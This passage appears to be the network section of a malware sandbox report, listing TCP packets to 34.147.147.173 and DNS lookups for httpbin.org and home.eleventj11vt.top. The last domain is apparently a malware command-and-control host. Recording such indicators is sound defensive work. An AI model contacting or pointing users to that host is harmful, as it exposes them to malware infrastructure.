Dec 31, 2024 16:47:42.283181906 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283204079 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.283226013 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.283271074 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283283949 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283315897 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.283332109 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.283333063 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283343077 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283385038 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.283426046 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283473015 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.283734083 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283742905 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283751965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283759117 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.283817053 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.284022093 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.284112930 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.284264088 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.287663937 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.287736893 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.287965059 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.288012028 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.292900085 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292908907 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292917013 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292926073 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292932987 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292941093 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292943954 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292949915 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.292963028 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.292989969 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.293004990 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.293014050 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.293215990 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.293282986 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.297787905 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.297797918 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.297806025 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298028946 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298038960 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298116922 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298125029 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298141003 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298149109 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298265934 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298274994 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298345089 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298352957 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298368931 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.298408031 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298417091 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298428059 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298429966 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.298437119 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298453093 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298460960 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298497915 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298506975 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298551083 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298558950 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298595905 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298604965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298619986 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298628092 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298636913 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298670053 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298692942 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298711061 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298731089 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298775911 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298803091 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298832893 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.298984051 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299257994 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299267054 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299273968 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299302101 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299310923 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299324989 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299334049 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299354076 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299361944 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299376965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299386024 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299428940 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299438000 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299480915 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299489021 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299525023 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299534082 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299567938 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299576044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299701929 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299710035 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.299719095 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303275108 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303284883 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303292036 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303335905 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303344011 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303388119 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303397894 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303438902 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303447008 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303478956 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303488016 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303565979 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303574085 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303622961 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303631067 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303667068 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.303682089 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303690910 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303724051 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.303744078 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303752899 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303775072 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303783894 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303821087 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303829908 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303903103 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303911924 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.303992033 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304001093 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304032087 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304039955 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304080963 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304089069 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304152966 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304161072 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304191113 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304198980 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304248095 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304256916 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304311991 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304322958 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304331064 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304347038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304405928 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304414988 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304456949 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304544926 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304553986 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304560900 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304577112 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304585934 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304636002 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304644108 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304687977 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.304697037 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308578968 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308588982 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308636904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308645010 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308708906 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308717012 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308788061 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308796883 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308806896 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308815002 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308866978 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308876038 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308886051 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.308947086 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.308965921 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.308974981 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309051991 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309060097 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309124947 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309134007 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309200048 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309207916 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309251070 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309258938 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309286118 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309294939 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309308052 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309345961 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309402943 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309411049 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309479952 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309490919 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309550047 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309559107 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309604883 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309612989 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309647083 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309653997 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309700012 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309709072 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309745073 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309752941 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309839010 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309848070 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309856892 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309917927 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309926033 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309933901 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309967041 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309974909 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.309998989 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.310007095 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.310072899 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.310081005 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.310090065 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.313888073 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.313920975 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.313993931 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314002991 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314033985 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314085007 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:42.314088106 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314127922 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314152956 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314193964 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314203024 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314224005 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314233065 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314270973 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314326048 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314335108 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314342022 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314363003 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314372063 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314455986 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314465046 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314541101 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314549923 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314595938 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314604998 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314640999 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314650059 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314660072 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314733982 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314743042 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314750910 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314785957 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314794064 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314802885 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314838886 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314922094 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314929962 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314969063 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.314977884 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315035105 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315043926 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315052986 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315061092 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315078020 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315087080 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315102100 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315109968 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315119982 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315126896 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315141916 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315152884 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315182924 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315191984 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.315201044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.318869114 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.318994045 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319003105 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319163084 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319171906 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319216967 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319230080 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319266081 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319299936 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319320917 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319331884 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319346905 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319355965 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319407940 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319416046 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319449902 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319458961 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319498062 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319505930 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319521904 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319530964 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319546938 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319555044 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319597960 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319606066 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319633007 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319648981 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319657087 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:42.319664955 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:44.915911913 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:44.916186094 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:44.921262026 CET	80	49731	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:44.923387051 CET	49731	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:45.808083057 CET	49738	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:45.812903881 CET	80	49738	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:45.815345049 CET	49738	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:45.816412926 CET	49738	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:45.822504044 CET	80	49738	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:46.445859909 CET	80	49738	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:46.446110010 CET	49738	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:46.451174974 CET	80	49738	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:46.451255083 CET	49738	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:47.112271070 CET	49739	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:47.117079973 CET	80	49739	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:47.117149115 CET	49739	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:47.117332935 CET	49739	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:47.122086048 CET	80	49739	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:47.812144041 CET	80	49739	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:47.812647104 CET	49739	80	192.168.2.4	34.147.147.173
Dec 31, 2024 16:47:47.817724943 CET	80	49739	34.147.147.173	192.168.2.4
Dec 31, 2024 16:47:47.817785978 CET	49739	80	192.168.2.4	34.147.147.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 16:47:27.210378885 CET	60838	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:27.210418940 CET	60838	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:27.217519999 CET	53	60838	1.1.1.1	192.168.2.4
Dec 31, 2024 16:47:27.233774900 CET	53	60838	1.1.1.1	192.168.2.4
Dec 31, 2024 16:47:40.731579065 CET	60841	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:40.731636047 CET	60841	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:41.513448000 CET	53	60841	1.1.1.1	192.168.2.4
Dec 31, 2024 16:47:41.843355894 CET	53	60841	1.1.1.1	192.168.2.4
Dec 31, 2024 16:47:44.926142931 CET	57170	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:44.926203012 CET	57170	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:45.559292078 CET	53	57170	1.1.1.1	192.168.2.4
Dec 31, 2024 16:47:45.807375908 CET	53	57170	1.1.1.1	192.168.2.4
Dec 31, 2024 16:47:46.452112913 CET	57172	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:46.452152014 CET	57172	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:47:47.111618042 CET	53	57172	1.1.1.1	192.168.2.4
Dec 31, 2024 16:47:47.111725092 CET	53	57172	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 16:47:27.210378885 CET	192.168.2.4	1.1.1.1	0xab1c	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:47:27.210418940 CET	192.168.2.4	1.1.1.1	0x5a52	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 31, 2024 16:47:40.731579065 CET	192.168.2.4	1.1.1.1	0x478d	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:47:40.731636047 CET	192.168.2.4	1.1.1.1	0xfa42	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false
Dec 31, 2024 16:47:44.926142931 CET	192.168.2.4	1.1.1.1	0x4883	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
